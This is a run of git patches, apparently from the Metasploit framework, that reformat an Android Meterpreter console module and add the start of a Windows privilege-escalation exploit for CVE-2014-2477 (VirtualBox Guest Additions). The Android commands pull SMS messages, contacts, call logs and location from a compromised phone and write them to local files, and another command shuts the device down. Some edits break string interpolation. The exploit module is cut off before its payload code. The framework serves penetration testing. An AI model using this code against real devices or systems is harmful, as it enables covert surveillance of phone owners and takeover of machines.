@@ -24,21 +24,21 @@ class Console::CommandDispatcher::Android
   #
  def commands
     all = {
-      "dump_sms"          => "Get sms messages",
-      "dump_contacts"     => "Get contacts list",
-      "geolocate"         => "Get current lat-long using geolocation",
-      "dump_calllog"      => "Get call log",
-      "check_root"        => "Check if device is rooted",
-      "device_shutdown"   => "Shutdown device"
+      'dump_sms'          => 'Get sms messages',
+      'dump_contacts'     => 'Get contacts list',
+      'geolocate'         => 'Get current lat-long using geolocation',
+      'dump_calllog'      => 'Get call log',
+      'check_root'        => 'Check if device is rooted',
+      'device_shutdown'   => 'Shutdown device'
     }
 
     reqs = {
-      "dump_sms"   		=> [ "dump_sms" ],
-      "dump_contacts" => [ "dump_contacts"],
-      "geolocate"   	=> [ "geolocate"],
-      "dump_calllog"  => [ "dump_calllog"],
-      "check_root"    => [ "check_root"],
-      "device_shutdown" => [ "device_shutdown"]
+      'dump_sms'        => [ 'dump_sms' ],
+      'dump_contacts'   => [ 'dump_contacts'],
+      'geolocate'       => [ 'geolocate'],
+      'dump_calllog'    => [ 'dump_calllog'],
+      'check_root'      => [ 'check_root'],
+      'device_shutdown' => [ 'device_shutdown']
     }
 
     all.delete_if do |cmd, desc|
@@ -52,47 +52,47 @@ class Console::CommandDispatcher::Android
 
     seconds = 0
     device_shutdown_opts = Rex::Parser::Arguments.new(
-      "-h" => [ false, "Help Banner" ],
-      "-t" => [ false, "Shutdown after n seconds"]
+      '-h' => [ false, 'Help Banner' ],
+      '-t' => [ false, 'Shutdown after n seconds']
     )
 
     device_shutdown_opts.parse( args ) { | opt, idx, val |
       case opt
-      when "-h"
-        print_line( "Usage: device_shutdown [options]\n" )
-        print_line( "Shutdown device." )
+      when '-h'
+        print_line('Usage: device_shutdown [options]\n' )
+        print_line('Shutdown device.' )
         print_line( device_shutdown_opts.usage )
         return
-      when "-t"
-        seconds = val
+      when '-t'
+        seconds = val.to_i
       end
     }
 
     res = client.android.device_shutdown(seconds)
 
-    if res == true
-      print_status("Device will shutdown #{seconds > 0 ?("after " + seconds + "seconds"):"now"}")
+    if res
+      print_status("Device will shutdown #{seconds > 0 ?('after ' + seconds + ' seconds'):'now'}")
     else
-      print_error("Device shutdown failed")
+      print_error('Device shutdown failed')
     end
   end
   
   def cmd_dump_sms(*args)
 
-    path = "sms_dump_" + Rex::Text.rand_text_alpha(8) + ".txt"
+    path = 'sms_dump_' + Rex::Text.rand_text_alpha(8) + '.txt'
     dump_sms_opts = Rex::Parser::Arguments.new(
-        "-h" => [ false, "Help Banner" ],
-        "-o" => [ false, "Output path for sms list"]
+        '-h' => [ false, 'Help Banner' ],
+        '-o' => [ false, 'Output path for sms list']
       )
 
     dump_sms_opts.parse( args ) { | opt, idx, val |
       case opt
-      when "-h"
-        print_line( "Usage: dump_sms [options]\n" )
-        print_line( "Get sms messages." )
+      when '-h'
+        print_line('Usage: dump_sms [options]\n' )
+        print_line('Get sms messages.' )
         print_line( dump_sms_opts.usage )
         return
-      when "-o"
+      when '-o'
         path = val
       end
     }
@@ -101,72 +101,72 @@ class Console::CommandDispatcher::Android
     smsList = client.android.dump_sms
 
     if smsList.count > 0
-      print_status( "Fetching #{smsList.count} sms #{smsList.count == 1? 'message': 'messages'}" )
+      print_status("Fetching #{smsList.count} sms #{smsList.count == 1? 'message': 'messages'}")
       begin
         info = client.sys.config.sysinfo
 
         ::File.open( path, 'wb' ) do |fd|
 
-          fd.write("\n=====================\n")
-          fd.write("[+] Sms messages dump\n")
-          fd.write("=====================\n\n")
+          fd.write('\n=====================\n')
+          fd.write('[+] Sms messages dump\n')
+          fd.write('=====================\n\n')
 
           time = Time.new
-          fd.write("Date: #{time.inspect}\n")
+          fd.write('Date: #{time.inspect}\n')
           fd.write("OS: #{info['OS']}\n")
-          fd.write("Remote IP: #{client.sock.peerhost}\n")
-          fd.write("Remote Port: #{client.sock.peerport}\n\n")
+          fd.write('Remote IP: #{client.sock.peerhost}\n')
+          fd.write('Remote Port: #{client.sock.peerport}\n\n')
 
           smsList.each_with_index { |a, index|
 
-            fd.write("##{(index.to_i + 1).to_s()}\n")
+            fd.write('##{(index.to_i + 1).to_s()}\n')
 
-            type = "Unknown"
-            if a['type'] == "1"
-              type = "Incoming"
-            elsif a['type'] == "2"
-              type = "Outgoing"
+            type = 'Unknown'
+            if a['type'] == '1'
+              type = 'Incoming'
+            elsif a['type'] == '2'
+              type = 'Outgoing'
             end
 
-            status = "Unknown"
-            if a['status'] == "-1"
-              status = "NOT_RECEIVED"
-            elsif a['status'] == "1"
-              status = "SME_UNABLE_TO_CONFIRM"
-            elsif a['status'] == "0"
-              status = "SUCCESS"
-            elsif a['status'] == "64"
-              status = "MASK_PERMANENT_ERROR"
-            elsif a['status'] == "32"
-              status = "MASK_TEMPORARY_ERROR"
-            elsif a['status'] == "2"
-              status = "SMS_REPLACED_BY_SC"
+            status = 'Unknown'
+            if a['status'] == '-1'
+              status = 'NOT_RECEIVED'
+            elsif a['status'] == '1'
+              status = 'SME_UNABLE_TO_CONFIRM'
+            elsif a['status'] == '0'
+              status = 'SUCCESS'
+            elsif a['status'] == '64'
+              status = 'MASK_PERMANENT_ERROR'
+            elsif a['status'] == '32'
+              status = 'MASK_TEMPORARY_ERROR'
+            elsif a['status'] == '2'
+              status = 'SMS_REPLACED_BY_SC'
             end
 
-            fd.write("Type\t: #{type}\n")
+            fd.write('Type\t: #{type}\n')
 
             time = a['date'].to_i / 1000
             time = Time.at(time)
 
-            fd.write("Date\t: #{time.strftime("%Y-%m-%d %H:%M:%S")}\n")
-            fd.write("Address\t: #{a['address']}\n")
-            fd.write("Status\t: #{status}\n")
-            fd.write("Message\t: #{a['body']}\n\n")
+            fd.write("Date\t: #{time.strftime('%Y-%m-%d %H:%M:%S')}\n")
+            fd.write('Address\t: #{a['address']}\n')
+            fd.write('Status\t: #{status}\n')
+            fd.write('Message\t: #{a['body']}\n\n')
           }
         end
 
         path = ::File.expand_path( path )
 
-        print_status( "Sms #{smsList.count == 1? 'message': 'messages'} saved to: #{path}" )
+        print_status('Sms #{smsList.count == 1? 'message': 'messages'} saved to: #{path}' )
         Rex::Compat.open_file( path )
 
         return true
       rescue
-        print_error("Error getting messages")
+        print_error('Error getting messages')
         return false
       end
     else
-      print_status( "No sms messages were found!" )
+      print_status('No sms messages were found!' )
       return false
     end
   end
@@ -174,22 +174,22 @@ class Console::CommandDispatcher::Android
 
   def cmd_dump_contacts(*args)
 
-    path    = "contacts_dump_" + Rex::Text.rand_text_alpha(8) + ".txt"
+    path    = 'contacts_dump_' + Rex::Text.rand_text_alpha(8) + '.txt'
     dump_contacts_opts = Rex::Parser::Arguments.new(
 
-      "-h" => [ false, "Help Banner" ],
-      "-o" => [ false, "Output path for contacts list"]
+      '-h' => [ false, 'Help Banner' ],
+      '-o' => [ false, 'Output path for contacts list']
 
       )
 
     dump_contacts_opts.parse( args ) { | opt, idx, val |
       case opt
-      when "-h"
-        print_line( "Usage: dump_contacts [options]\n" )
-        print_line( "Get contacts list." )
+      when '-h'
+        print_line('Usage: dump_contacts [options]\n' )
+        print_line('Get contacts list.' )
         print_line( dump_contacts_opts.usage )
         return
-      when "-o"
+      when '-o'
         path = val
       end
     }
@@ -198,54 +198,54 @@ class Console::CommandDispatcher::Android
     contactList = client.android.dump_contacts
 
     if contactList.count > 0
-      print_status( "Fetching #{contactList.count} #{contactList.count == 1? 'contact': 'contacts'} into list" )
+      print_status('Fetching #{contactList.count} #{contactList.count == 1? 'contact': 'contacts'} into list' )
       begin
         info = client.sys.config.sysinfo
 
         ::File.open( path, 'wb' ) do |fd|
 
-          fd.write("\n======================\n")
-          fd.write("[+] Contacts list dump\n")
-          fd.write("======================\n\n")
+          fd.write('\n======================\n')
+          fd.write('[+] Contacts list dump\n')
+          fd.write('======================\n\n')
 
           time = Time.new
-          fd.write("Date: #{time.inspect}\n")
-          fd.write("OS: #{info['OS']}\n")
-          fd.write("Remote IP: #{client.sock.peerhost}\n")
-          fd.write("Remote Port: #{client.sock.peerport}\n\n")
+          fd.write('Date: #{time.inspect}\n')
+          fd.write('OS: #{info['OS']}\n')
+          fd.write('Remote IP: #{client.sock.peerhost}\n')
+          fd.write('Remote Port: #{client.sock.peerport}\n\n')
 
           contactList.each_with_index { |c, index|
 
-            fd.write("##{(index.to_i + 1).to_s()}\n")
-            fd.write("Name\t: #{c['name']}\n")
+            fd.write('##{(index.to_i + 1).to_s()}\n')
+            fd.write('Name\t: #{c['name']}\n')
 
             if c['number'].count > 0
               (c['number']).each { |n|
-                fd.write("Number\t: #{n}\n")
+                fd.write('Number\t: #{n}\n')
               }
             end
 
             if c['email'].count > 0
               (c['email']).each { |n|
-                fd.write("Email\t: #{n}\n")
+                fd.write('Email\t: #{n}\n')
               }
             end
 
-            fd.write("\n")
+            fd.write('\n')
           }
         end
 
         path = ::File.expand_path( path )
-        print_status( "Contacts list saved to: #{path}" )
+        print_status('Contacts list saved to: #{path}' )
         Rex::Compat.open_file( path )
 
         return true
       rescue
-        print_error("Error getting contacts list")
+        print_error('Error getting contacts list')
         return false
       end
     else
-      print_status( "No contacts were found!" )
+      print_status('No contacts were found!' )
       return false
     end
   end
@@ -255,35 +255,35 @@ class Console::CommandDispatcher::Android
     generate_map = false
     geolocate_opts = Rex::Parser::Arguments.new(
 
-      "-h" => [ false, "Help Banner" ],
-      "-g" => [ false, "Generate map using google-maps"]
+      '-h' => [ false, 'Help Banner' ],
+      '-g' => [ false, 'Generate map using google-maps']
 
       )
 
     geolocate_opts.parse( args ) { | opt, idx, val |
       case opt
-      when "-h"
-        print_line( "Usage: geolocate [options]\n" )
-        print_line( "Get current location using geolocation." )
+      when '-h'
+        print_line('Usage: geolocate [options]\n' )
+        print_line('Get current location using geolocation.' )
         print_line( geolocate_opts.usage )
         return
-      when "-g"
+      when '-g'
         generate_map = true
       end
     }
 
     geo = client.android.geolocate
 
-    print_status("Current Location:\n")
-    print_line("\tLatitude  : #{geo[0]['lat']}")
-    print_line("\tLongitude : #{geo[0]['long']}\n")
-    print_line("To get the address: https://maps.googleapis.com/maps/api/geocode/json?latlng=#{geo[0]['lat']},#{geo[0]['long']}&sensor=true\n")
+    print_status('Current Location:\n')
+    print_line('\tLatitude  : #{geo[0]['lat']}')
+    print_line('\tLongitude : #{geo[0]['long']}\n')
+    print_line('To get the address: https://maps.googleapis.com/maps/api/geocode/json?latlng=#{geo[0]['lat']},#{geo[0]['long']}&sensor=true\n')
 
 
     if generate_map
-      link = "https://maps.google.com/maps?q=#{geo[0]['lat']},#{geo[0]['long']}"
-      print_status("Generated map on google-maps:")
-      print_status("#{link}")
+      link = 'https://maps.google.com/maps?q=#{geo[0]['lat']},#{geo[0]['long']}'
+      print_status('Generated map on google-maps:')
+      print_status('#{link}')
       Rex::Compat.open_browser(link)
     end
 
@@ -291,22 +291,22 @@ class Console::CommandDispatcher::Android
 
   def cmd_dump_calllog(*args)
 
-    path = "dump_calllog_" + Rex::Text.rand_text_alpha(8) + ".txt"
+    path = 'dump_calllog_' + Rex::Text.rand_text_alpha(8) + '.txt'
     dump_calllog_opts = Rex::Parser::Arguments.new(
 
-      "-h" => [ false, "Help Banner" ],
-      "-o" => [ false, "Output path for call log"]
+      '-h' => [ false, 'Help Banner' ],
+      '-o' => [ false, 'Output path for call log']
 
       )
 
     dump_calllog_opts.parse( args ) { | opt, idx, val |
       case opt
-      when "-h"
-        print_line( "Usage: dump_calllog [options]\n" )
-        print_line( "Get call log." )
+      when '-h'
+        print_line('Usage: dump_calllog [options]\n' )
+        print_line('Get call log.' )
         print_line( dump_calllog_opts.usage )
         return
-      when "-o"
+      when '-o'
         path = val
       end
     }
@@ -314,45 +314,45 @@ class Console::CommandDispatcher::Android
     log = client.android.dump_calllog
 
     if log.count > 0
-      print_status( "Fetching #{log.count} #{log.count == 1? 'entry': 'entries'}" )
+      print_status('Fetching #{log.count} #{log.count == 1? 'entry': 'entries'}' )
       begin
         info = client.sys.config.sysinfo
 
         ::File.open( path, 'wb' ) do |fd|
 
-          fd.write("\n=================\n")
-          fd.write("[+] Call log dump\n")
-          fd.write("=================\n\n")
+          fd.write('\n=================\n')
+          fd.write('[+] Call log dump\n')
+          fd.write('=================\n\n')
 
           time = Time.new
-          fd.write("Date: #{time.inspect}\n")
-          fd.write("OS: #{info['OS']}\n")
-          fd.write("Remote IP: #{client.sock.peerhost}\n")
-          fd.write("Remote Port: #{client.sock.peerport}\n\n")
+          fd.write('Date: #{time.inspect}\n')
+          fd.write('OS: #{info['OS']}\n')
+          fd.write('Remote IP: #{client.sock.peerhost}\n')
+          fd.write('Remote Port: #{client.sock.peerport}\n\n')
 
           log.each_with_index { |a, index|
 
-            fd.write("##{(index.to_i + 1).to_s()}\n")
+            fd.write('##{(index.to_i + 1).to_s()}\n')
 
-            fd.write("Number\t: #{a['number']}\n")
-            fd.write("Name\t: #{a['name']}\n")
-            fd.write("Date\t: #{a['date']}\n")
-            fd.write("Type\t: #{a['type']}\n")
-            fd.write("Duration: #{a['duration']}\n\n")
+            fd.write('Number\t: #{a['number']}\n')
+            fd.write('Name\t: #{a['name']}\n')
+            fd.write('Date\t: #{a['date']}\n')
+            fd.write('Type\t: #{a['type']}\n')
+            fd.write('Duration: #{a['duration']}\n\n')
           }
         end
 
         path = ::File.expand_path( path )
-        print_status( "Call log saved to: #{path}" )
+        print_status('Call log saved to: #{path}' )
         Rex::Compat.open_file( path )
 
         return true
       rescue
-        print_error("Error getting call log")
+        print_error('Error getting call log')
         return false
       end
     else
-      print_status( "No call log entries were found!" )
+      print_status('No call log entries were found!' )
       return false
     end
   end
@@ -361,25 +361,25 @@ class Console::CommandDispatcher::Android
   def cmd_check_root(*args)
 
     check_root_opts = Rex::Parser::Arguments.new(
-      "-h" => [ false, "Help Banner" ]
+      '-h' => [ false, 'Help Banner' ]
       )
 
     check_root_opts.parse( args ) { | opt, idx, val |
       case opt
-      when "-h"
-        print_line( "Usage: check_root [options]\n" )
-        print_line( "Check if device is rooted." )
+      when '-h'
+        print_line('Usage: check_root [options]\n' )
+        print_line('Check if device is rooted.' )
         print_line( check_root_opts.usage )
         return
       end
     }
 
-    isRooted = client.android.check_root
+    is_rooted = client.android.check_root
 
-    if isRooted == true
-      print_status("Device is rooted")
+    if is_rooted
+      print_status('Device is rooted')
     elsif
-      print_status("Device is not rooted")
+      print_status('Device is not rooted')
     end
   end
 
@@ -387,7 +387,7 @@ class Console::CommandDispatcher::Android
   # Name for this dispatcher
   #
   def name
-    "Android"
+    'Android'
   end
 
 end

From ead7b35aa96a885b59392d88f8cd59dfa3a73c5e Mon Sep 17 00:00:00 2001
From: AnwarMohamed <anwarelmakrahy@gmail.com>
Date: Tue, 8 Jul 2014 10:48:24 +0200
Subject: [PATCH 126/321] formating

---
 lib/rex/post/meterpreter/extensions/android/android.rb | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb
index b6e5cb0c12..6399e31757 100644
--- a/lib/rex/post/meterpreter/extensions/android/android.rb
+++ b/lib/rex/post/meterpreter/extensions/android/android.rb
@@ -123,8 +123,8 @@ class Android < Extension
   
 end
 
-end; 
-end; 
-end; 
-end; 
+end
+end
+end
+end
 end

From a513f403bab5a61a86fcf4104c6a9b26b13cff18 Mon Sep 17 00:00:00 2001
From: AnwarMohamed <anwarelmakrahy@gmail.com>
Date: Tue, 8 Jul 2014 10:58:48 +0200
Subject: [PATCH 127/321] fixing bugs

---
 lib/msf/base/sessions/meterpreter_java.rb     |   2 +-
 .../meterpreter/extensions/android/tlv.rb     |   8 +-
 .../ui/console/command_dispatcher/android.rb  | 122 +++++++++---------
 3 files changed, 66 insertions(+), 66 deletions(-)

diff --git a/lib/msf/base/sessions/meterpreter_java.rb b/lib/msf/base/sessions/meterpreter_java.rb
index 8c697ac91a..bb50e5cdeb 100644
--- a/lib/msf/base/sessions/meterpreter_java.rb
+++ b/lib/msf/base/sessions/meterpreter_java.rb
@@ -22,7 +22,7 @@ class Meterpreter_Java_Java < Msf::Sessions::Meterpreter
     self.platform      = 'java/java'
     self.binary_suffix = 'jar'
   end
-  def load_android() 
+  def load_android
     self.platform = 'java/android'  
     console.disable_output = true
     console.run_single('load android')
diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb
index fbd9efd227..879afbe944 100644
--- a/lib/rex/post/meterpreter/extensions/android/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb
@@ -33,8 +33,8 @@ TLV_TYPE_CHECK_ROOT_BOOL  = TLV_META_TYPE_BOOL      | (TLV_EXTENSIONS + 9019)
 
 TLV_TYPE_SHUTDOWN_TIMER   = TLV_META_TYPE_UINT      | (TLV_EXTENSIONS + 9020)
 
-end; 
-end; 
-end; 
-end; 
+end
+end
+end
+end
 end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
index a7c4f872da..7f451653e5 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
@@ -54,14 +54,14 @@ class Console::CommandDispatcher::Android
     device_shutdown_opts = Rex::Parser::Arguments.new(
       '-h' => [ false, 'Help Banner' ],
       '-t' => [ false, 'Shutdown after n seconds']
-    )
+  )
 
-    device_shutdown_opts.parse( args ) { | opt, idx, val |
+    device_shutdown_opts.parse(args) { | opt, idx, val |
       case opt
       when '-h'
-        print_line('Usage: device_shutdown [options]\n' )
-        print_line('Shutdown device.' )
-        print_line( device_shutdown_opts.usage )
+        print_line('Usage: device_shutdown [options]\n')
+        print_line('Shutdown device.')
+        print_line(device_shutdown_opts.usage)
         return
       when '-t'
         seconds = val.to_i
@@ -83,14 +83,14 @@ class Console::CommandDispatcher::Android
     dump_sms_opts = Rex::Parser::Arguments.new(
         '-h' => [ false, 'Help Banner' ],
         '-o' => [ false, 'Output path for sms list']
-      )
+    )
 
-    dump_sms_opts.parse( args ) { | opt, idx, val |
+    dump_sms_opts.parse(args) { | opt, idx, val |
       case opt
       when '-h'
-        print_line('Usage: dump_sms [options]\n' )
-        print_line('Get sms messages.' )
-        print_line( dump_sms_opts.usage )
+        print_line('Usage: dump_sms [options]\n')
+        print_line('Get sms messages.')
+        print_line(dump_sms_opts.usage)
         return
       when '-o'
         path = val
@@ -105,7 +105,7 @@ class Console::CommandDispatcher::Android
       begin
         info = client.sys.config.sysinfo
 
-        ::File.open( path, 'wb' ) do |fd|
+        ::File.open(path, 'wb') do |fd|
 
           fd.write('\n=====================\n')
           fd.write('[+] Sms messages dump\n')
@@ -149,16 +149,16 @@ class Console::CommandDispatcher::Android
             time = Time.at(time)
 
             fd.write("Date\t: #{time.strftime('%Y-%m-%d %H:%M:%S')}\n")
-            fd.write('Address\t: #{a['address']}\n')
+            fd.write("Address\t: #{a['address']}\n")
             fd.write('Status\t: #{status}\n')
-            fd.write('Message\t: #{a['body']}\n\n')
+            fd.write("Message\t: #{a['body']}\n\n")
           }
         end
 
-        path = ::File.expand_path( path )
+        path = ::File.expand_path(path)
 
-        print_status('Sms #{smsList.count == 1? 'message': 'messages'} saved to: #{path}' )
-        Rex::Compat.open_file( path )
+        print_status("Sms #{smsList.count == 1? 'message': 'messages'} saved to: #{path}")
+        Rex::Compat.open_file(path)
 
         return true
       rescue
@@ -166,7 +166,7 @@ class Console::CommandDispatcher::Android
         return false
       end
     else
-      print_status('No sms messages were found!' )
+      print_status('No sms messages were found!')
       return false
     end
   end
@@ -180,14 +180,14 @@ class Console::CommandDispatcher::Android
       '-h' => [ false, 'Help Banner' ],
       '-o' => [ false, 'Output path for contacts list']
 
-      )
+    )
 
-    dump_contacts_opts.parse( args ) { | opt, idx, val |
+    dump_contacts_opts.parse(args) { | opt, idx, val |
       case opt
       when '-h'
-        print_line('Usage: dump_contacts [options]\n' )
-        print_line('Get contacts list.' )
-        print_line( dump_contacts_opts.usage )
+        print_line('Usage: dump_contacts [options]\n')
+        print_line('Get contacts list.')
+        print_line(dump_contacts_opts.usage)
         return
       when '-o'
         path = val
@@ -198,11 +198,11 @@ class Console::CommandDispatcher::Android
     contactList = client.android.dump_contacts
 
     if contactList.count > 0
-      print_status('Fetching #{contactList.count} #{contactList.count == 1? 'contact': 'contacts'} into list' )
+      print_status("Fetching #{contactList.count} #{contactList.count == 1? 'contact': 'contacts'} into list")
       begin
         info = client.sys.config.sysinfo
 
-        ::File.open( path, 'wb' ) do |fd|
+        ::File.open(path, 'wb') do |fd|
 
           fd.write('\n======================\n')
           fd.write('[+] Contacts list dump\n')
@@ -210,14 +210,14 @@ class Console::CommandDispatcher::Android
 
           time = Time.new
           fd.write('Date: #{time.inspect}\n')
-          fd.write('OS: #{info['OS']}\n')
+          fd.write("OS: #{info['OS']}\n")
           fd.write('Remote IP: #{client.sock.peerhost}\n')
           fd.write('Remote Port: #{client.sock.peerport}\n\n')
 
           contactList.each_with_index { |c, index|
 
             fd.write('##{(index.to_i + 1).to_s()}\n')
-            fd.write('Name\t: #{c['name']}\n')
+            fd.write("Name\t: #{c['name']}\n")
 
             if c['number'].count > 0
               (c['number']).each { |n|
@@ -235,9 +235,9 @@ class Console::CommandDispatcher::Android
           }
         end
 
-        path = ::File.expand_path( path )
-        print_status('Contacts list saved to: #{path}' )
-        Rex::Compat.open_file( path )
+        path = ::File.expand_path(path)
+        print_status('Contacts list saved to: #{path}')
+        Rex::Compat.open_file(path)
 
         return true
       rescue
@@ -245,7 +245,7 @@ class Console::CommandDispatcher::Android
         return false
       end
     else
-      print_status('No contacts were found!' )
+      print_status('No contacts were found!')
       return false
     end
   end
@@ -258,14 +258,14 @@ class Console::CommandDispatcher::Android
       '-h' => [ false, 'Help Banner' ],
       '-g' => [ false, 'Generate map using google-maps']
 
-      )
+    )
 
-    geolocate_opts.parse( args ) { | opt, idx, val |
+    geolocate_opts.parse(args) { | opt, idx, val |
       case opt
       when '-h'
-        print_line('Usage: geolocate [options]\n' )
-        print_line('Get current location using geolocation.' )
-        print_line( geolocate_opts.usage )
+        print_line('Usage: geolocate [options]\n')
+        print_line('Get current location using geolocation.')
+        print_line(geolocate_opts.usage)
         return
       when '-g'
         generate_map = true
@@ -275,13 +275,13 @@ class Console::CommandDispatcher::Android
     geo = client.android.geolocate
 
     print_status('Current Location:\n')
-    print_line('\tLatitude  : #{geo[0]['lat']}')
-    print_line('\tLongitude : #{geo[0]['long']}\n')
-    print_line('To get the address: https://maps.googleapis.com/maps/api/geocode/json?latlng=#{geo[0]['lat']},#{geo[0]['long']}&sensor=true\n')
+    print_line("\tLatitude  : #{geo[0]['lat']}")
+    print_line("\tLongitude : #{geo[0]['long']}\n")
+    print_line("To get the address: https://maps.googleapis.com/maps/api/geocode/json?latlng=#{geo[0]['lat']},#{geo[0]['long']}&sensor=true\n")
 
 
     if generate_map
-      link = 'https://maps.google.com/maps?q=#{geo[0]['lat']},#{geo[0]['long']}'
+      link = "https://maps.google.com/maps?q=#{geo[0]['lat']},#{geo[0]['long']}"
       print_status('Generated map on google-maps:')
       print_status('#{link}')
       Rex::Compat.open_browser(link)
@@ -297,14 +297,14 @@ class Console::CommandDispatcher::Android
       '-h' => [ false, 'Help Banner' ],
       '-o' => [ false, 'Output path for call log']
 
-      )
+    )
 
-    dump_calllog_opts.parse( args ) { | opt, idx, val |
+    dump_calllog_opts.parse(args) { | opt, idx, val |
       case opt
       when '-h'
-        print_line('Usage: dump_calllog [options]\n' )
-        print_line('Get call log.' )
-        print_line( dump_calllog_opts.usage )
+        print_line('Usage: dump_calllog [options]\n')
+        print_line('Get call log.')
+        print_line(dump_calllog_opts.usage)
         return
       when '-o'
         path = val
@@ -314,11 +314,11 @@ class Console::CommandDispatcher::Android
     log = client.android.dump_calllog
 
     if log.count > 0
-      print_status('Fetching #{log.count} #{log.count == 1? 'entry': 'entries'}' )
+      print_status("Fetching #{log.count} #{log.count == 1? 'entry': 'entries'}")
       begin
         info = client.sys.config.sysinfo
 
-        ::File.open( path, 'wb' ) do |fd|
+        ::File.open(path, 'wb') do |fd|
 
           fd.write('\n=================\n')
           fd.write('[+] Call log dump\n')
@@ -326,7 +326,7 @@ class Console::CommandDispatcher::Android
 
           time = Time.new
           fd.write('Date: #{time.inspect}\n')
-          fd.write('OS: #{info['OS']}\n')
+          fd.write("OS: #{info['OS']}\n")
           fd.write('Remote IP: #{client.sock.peerhost}\n')
           fd.write('Remote Port: #{client.sock.peerport}\n\n')
 
@@ -334,17 +334,17 @@ class Console::CommandDispatcher::Android
 
             fd.write('##{(index.to_i + 1).to_s()}\n')
 
-            fd.write('Number\t: #{a['number']}\n')
-            fd.write('Name\t: #{a['name']}\n')
-            fd.write('Date\t: #{a['date']}\n')
-            fd.write('Type\t: #{a['type']}\n')
-            fd.write('Duration: #{a['duration']}\n\n')
+            fd.write("Number\t: #{a['number']}\n")
+            fd.write("Name\t: #{a['name']}\n")
+            fd.write("Date\t: #{a['date']}\n")
+            fd.write("Type\t: #{a['type']}\n")
+            fd.write("Duration: #{a['duration']}\n\n")
           }
         end
 
-        path = ::File.expand_path( path )
-        print_status('Call log saved to: #{path}' )
-        Rex::Compat.open_file( path )
+        path = ::File.expand_path(path)
+        print_status('Call log saved to: #{path}')
+        Rex::Compat.open_file(path)
 
         return true
       rescue
@@ -352,7 +352,7 @@ class Console::CommandDispatcher::Android
         return false
       end
     else
-      print_status('No call log entries were found!' )
+      print_status('No call log entries were found!')
       return false
     end
   end
@@ -362,14 +362,14 @@ class Console::CommandDispatcher::Android
 
     check_root_opts = Rex::Parser::Arguments.new(
       '-h' => [ false, 'Help Banner' ]
-      )
+    )
 
-    check_root_opts.parse( args ) { | opt, idx, val |
+    check_root_opts.parse(args) { | opt, idx, val |
       case opt
       when '-h'
-        print_line('Usage: check_root [options]\n' )
-        print_line('Check if device is rooted.' )
-        print_line( check_root_opts.usage )
+        print_line('Usage: check_root [options]\n')
+        print_line('Check if device is rooted.')
+        print_line(check_root_opts.usage)
         return
       end
     }

From e908bb68196b41a0757b2ce099b5e9610566a11a Mon Sep 17 00:00:00 2001
From: AnwarMohamed <anwarelmakrahy@gmail.com>
Date: Tue, 8 Jul 2014 11:02:41 +0200
Subject: [PATCH 128/321] formating

---
 modules/payloads/stages/android/meterpreter.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/payloads/stages/android/meterpreter.rb b/modules/payloads/stages/android/meterpreter.rb
index cbdd2578f2..b10ee80101 100644
--- a/modules/payloads/stages/android/meterpreter.rb
+++ b/modules/payloads/stages/android/meterpreter.rb
@@ -57,7 +57,7 @@ module Metasploit3
     super
     framework.sessions.schedule Proc.new {
       session.init_ui(self.user_input, self.user_output)
-      if (datastore['AutoLoadAndroid'] == true)
+      if (datastore['AutoLoadAndroid'])
         session.load_android
       end
     }

From cef2c257dc310f84f580ab4bc3c2d69ba86fb6ac Mon Sep 17 00:00:00 2001
From: Jay Smith <jsmith@korelogic.com>
Date: Wed, 16 Jul 2014 05:49:19 -0400
Subject: [PATCH 129/321] Add CVE-2014-2477 local privilege escalation

---
 modules/exploits/windows/local/vbox_guest.rb | 277 +++++++++++++++++++
 1 file changed, 277 insertions(+)
 create mode 100644 modules/exploits/windows/local/vbox_guest.rb

diff --git a/modules/exploits/windows/local/vbox_guest.rb b/modules/exploits/windows/local/vbox_guest.rb
new file mode 100644
index 0000000000..63bd49d110
--- /dev/null
+++ b/modules/exploits/windows/local/vbox_guest.rb
@@ -0,0 +1,277 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = AverageRanking
+
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'          => 'VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation',
+      'Description'    => %q{
+        A vulnerability within VBoxGuest module allows an attacker to inject memory they control
+        into an arbitrary location they define. This can be used by an attacker to overwrite
+        HalDispatchTable+0x4 and execute arbitrary code by subsequently calling
+        NtQueryIntervalProfile. This has been tested on VBoxGuest Additions up to 4.3.10r93012.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        =>
+        [
+          'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
+          'Jay Smith <jsmith[at]korelogic.com>' # MSF module
+        ],
+      'Arch'          => ARCH_X86,
+      'Platform'      => 'win',
+      'SessionTypes'  => [ 'meterpreter' ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Targets'       =>
+        [
+          [ 'Automatic', { } ],
+          [ 'Windows XP SP3', { } ],
+        ],
+      'References'    =>
+        [
+          [ 'CVE', '2014-2477' ],
+          [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-001.txt' ]
+        ],
+      'DisclosureDate'=> 'Jul 15 2014',
+      'DefaultTarget' => 0
+    }))
+
+  end
+
+  def add_railgun_functions
+    session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
+    session.railgun.add_function(
+      'psapi',
+      'EnumDeviceDrivers',
+      'BOOL',
+      [
+        ["PBLOB", "lpImageBase", "out"],
+        ["DWORD", "cb", "in"],
+        ["PDWORD", "lpcbNeeded", "out"]
+      ])
+    session.railgun.add_function(
+      'psapi',
+      'GetDeviceDriverBaseNameA',
+      'DWORD',
+      [
+        ["LPVOID", "ImageBase", "in"],
+        ["PBLOB", "lpBaseName", "out"],
